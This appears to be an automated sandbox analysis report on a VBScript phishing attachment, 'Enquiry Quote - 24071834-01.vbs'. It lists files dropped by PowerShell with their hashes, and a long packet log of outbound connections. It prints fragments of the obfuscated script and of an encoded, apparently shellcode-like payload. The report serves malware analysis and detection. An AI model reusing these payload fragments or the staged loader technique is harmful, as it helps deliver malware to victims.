              SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
              SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mnjqzuy.bve.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmb5p4uc.t0y.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezv0ptqm.sa1.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlfoliuw.vdt.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Roaming\Woes.uds

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):442592
              Entropy (8bit):5.932059423793645
              Encrypted:false
              SSDEEP:6144:UBboQnfO+EyMenUv0MnR3c07rgSvHSFbay0elUf+5p+12tRuoBX1UU/p+8:ebnrfU8MzrhyFbgYUSZiovG8
              MD5:E045DCE2B497F738701AACE12F084813
              SHA1:1B6D8A40B81D9E1B79C82E9BCC31D312E7BA87A0
              SHA-256:11ACB75B44152ED40AEB5F759678D16928862D7CE8E1132C5B0005982EAF2872
              SHA-512:CD43C0E8DC74B31AF56EB85C82EEB9B92FF5AF94982B79FF4192A506E392736A053CB3CD55E1A881F5DEF3988AF154D0FFF48A701E5655928CCB4FCDBE0F0682
              Malicious:false
              Preview:cQGbcQGbu0g0GgDrArzu6wLAGANcJARxAZtxAZu5pSP2knEBm+sCIYCB6ahS+gDrAv6NcQGbgcEDLwRucQGb6wKJJHEBm3EBm7pVQ3UYcQGbcQGbcQGb6wJcpDHK6wL0wusC78SJFAvrAsbYcQGb0eLrAg7HcQGbg8EEcQGb6wJ30IH5eB7mAnzK6wJl/esCjLiLRCQEcQGb6wJ2EYnDcQGbcQGbgcP4RwIBcQGbcQGbusUTCnZxAZtxAZuB8qu3VvLrArAx6wI6aIHCkluje3EBm+sC6x3rArnI6wKlnOsCvTfrAil8iwwQ6wIfx+sCxLSJDBNxAZvrAqXEQusCtZfrApcFgfoEqwQAddJxAZtxAZuJXCQM6wK0KXEBm4HtAAMAAOsCZoRxAZuLVCQIcQGbcQGbi3wkBHEBm+sCWgeJ63EBm3EBm4HDnAAAAHEBm+sCut1T6wLuQXEBm2pA6wL/GesCQfeJ6+sCtmPrAi9Jx4MAAQAAAGADA3EBm+sCl36BwwABAABxAZvrAiD5U3EBm3EBm4nr6wIh0XEBm4m7BAEAAHEBm+sCfBqBwwQBAABxAZvrAj3fU+sCF35xAZtq/3EBm+sCbBGDwgVxAZvrApKXMfbrAqe46wINRzHJ6wLHgXEBm4sacQGb6wK8JkHrAhzs6wKL+TkcCnXycQGbcQGbRusCM/JxAZuAfAr7uHXdcQGbcQGbi0QK/OsCxLVxAZsp8HEBm+sCCwn/0usC1ytxAZu6BKsEAOsCvUzrAvm/McBxAZvrApw5i3wkDHEBm+sC8nCBNAfksMDMcQGb6wLGVYPABHEBm3EBmznQdeVxAZvrArkeifvrApVB6wKVmP/XcQGb6wLEcWRORkk2OSULYa8/Mxuwu0/DMUXTG08/2nuU6k1hrz8zGxss8wIxRdMbTz/zGKcIgBs93zMbT7U7gokamW1Veajzm1wnosaNeil0vlNzTsiRAoMfxsbkOMzONAp4QF7UuDg0

              Static File Info

              General

              File type:ASCII text, with CRLF line terminators
              Entropy (8bit):5.330658060981545
              TrID:
              • Visual Basic Script (13500/0) 100.00%
              File name:Enquiry Quote - 24071834-01.vbs
              File size:23'868 bytes
              MD5:9e2fe2b97264a9c35794d67e1c17ee26
              SHA1:3d32f6f565e50eeeba893e7734a860b7bc45a1d4
              SHA256:d692bbec767a90d323a15ef761c1a207480f417ffd1509717e1b6793c0b7299a
              SHA512:e5d8af0649ec86485fa15b2450082f624450b8cc152726866f958ebb4d04db4785ef551fc3432aef12f1b8fb20a76caf297ed11a78e77a59d9773379ed6d1157
              SSDEEP:384:5EqYZpCSXbN69/uJxX0ibU5YytwTYX/PTlahj4cSSrrD9:5EqyL69/qxXq5ltwMvLEhDfrD9
              TLSH:C4B2D5FDD94E11A54E8E4FE2B44908F4B95333660037EC273B09AF98C4E16CF66084EA
              File Content Preview:..................Set Icterical = CreateObject("WScript.Shell")..nyvurderingerne = -9780..Unauthorized = "Bhutansk. verdensmesterens."..Protesttog = &H5DBC..Superinjustice = &HFFFF3B7F..Disconcertedly28 = "Prakker; provocation;"..Omfangs = &H5521..Urease1

              File Icon

              Icon Hash:68d69b8f86ab9a86

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 3, 2024 08:54:19.538064003 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:19.538125038 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:19.538227081 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:19.545727015 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:19.545757055 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.202364922 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.202442884 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:20.203124046 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.203176022 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:20.205488920 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:20.205504894 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.205796003 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.213710070 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:20.260505915 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.585401058 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.587465048 CEST44349706216.58.206.46192.168.2.7
              Jul 3, 2024 08:54:20.587522030 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:20.593641043 CEST49706443192.168.2.7216.58.206.46
              Jul 3, 2024 08:54:20.605931997 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:20.605993032 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:20.606096029 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:20.606451035 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:20.606467962 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:21.240601063 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:21.240786076 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:21.243129015 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:21.243141890 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:21.243380070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:21.244561911 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:21.292495012 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.454132080 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.454349995 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.458642006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.458725929 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.470483065 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.470611095 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.470912933 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.476804972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.476905107 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.476914883 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.524961948 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.539577007 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.540702105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.540766954 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.540775061 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.542026043 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.542124987 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.542129993 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.548119068 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.548338890 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.548345089 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.554167986 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.557636976 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.557646036 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.560178041 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.560375929 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.560385942 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.566181898 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.568149090 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.568154097 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.572210073 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.572293043 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.572298050 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.578217030 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.579087019 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.579092026 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.583750010 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.583817959 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.583822012 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.589289904 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.589358091 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.589361906 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.595046043 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.597635984 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.597640991 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.607629061 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.607726097 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.607731104 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.627054930 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.627240896 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.627245903 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.627454996 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.627531052 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.627536058 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.629123926 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.629185915 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.629190922 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.631140947 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.631206036 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.631211042 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.634610891 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.637636900 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.637648106 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.638693094 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.638768911 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.638772964 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.644200087 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.644279003 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.644283056 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.648926973 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.648998976 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.649003029 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.653531075 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.653606892 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.653610945 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.657883883 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.657962084 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.657965899 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.662381887 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.662456036 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.662461042 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.666851044 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.666928053 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.666933060 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.671181917 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.671252012 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.671256065 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.675663948 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.675729036 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.675733089 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.680064917 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.680155039 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.680159092 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.684237003 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.684309006 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.684313059 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.688184977 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.688246965 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.688251972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.692171097 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.692215919 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.692325115 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.692329884 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.692384005 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.695889950 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.699551105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.699604034 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.699618101 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.699623108 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.699664116 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.703847885 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.706407070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.706444025 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.706510067 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.706515074 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.706587076 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.709639072 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.712999105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.713079929 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.713084936 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.716392040 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.716460943 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.716464996 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.719700098 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.719768047 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.719772100 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.722018003 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.722057104 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.722086906 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.722090960 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.725646973 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.725652933 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.728212118 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.728262901 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.728285074 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.728288889 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.728385925 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.729160070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.731336117 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.731415987 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.731420994 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.733285904 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.733376980 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.733383894 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.734126091 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.734258890 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.734263897 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.736188889 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.736255884 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.736260891 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.738265991 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.738327026 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.738331079 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.740427017 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.740497112 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.740502119 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.742428064 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.742485046 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.742491007 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.744680882 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.744771957 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.744777918 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.746650934 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.746874094 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.746880054 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.750597000 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.750623941 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.750758886 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.750763893 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.750812054 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.751854897 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.753920078 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.753982067 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.753987074 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.755959034 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.756032944 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.756036997 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.757802963 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.757858038 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.757863045 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.759660006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.759718895 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.759722948 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.761650085 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.761708021 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.761714935 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.763811111 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.763865948 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.763870001 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.765685081 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.765739918 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.765743971 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.767707109 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.767786026 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.767790079 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.769399881 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.769465923 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.769469976 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.771791935 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.771851063 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.771856070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.773267984 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.773345947 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.773350954 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.773478985 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.773526907 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.773531914 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.776010036 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.776288986 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.776293993 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.777096033 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.777148962 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.777153015 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.779983044 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.780056000 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.780060053 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.780889988 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.780947924 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.780951977 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.783617973 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.783694029 CEST49707443192.168.2.7172.217.16.193
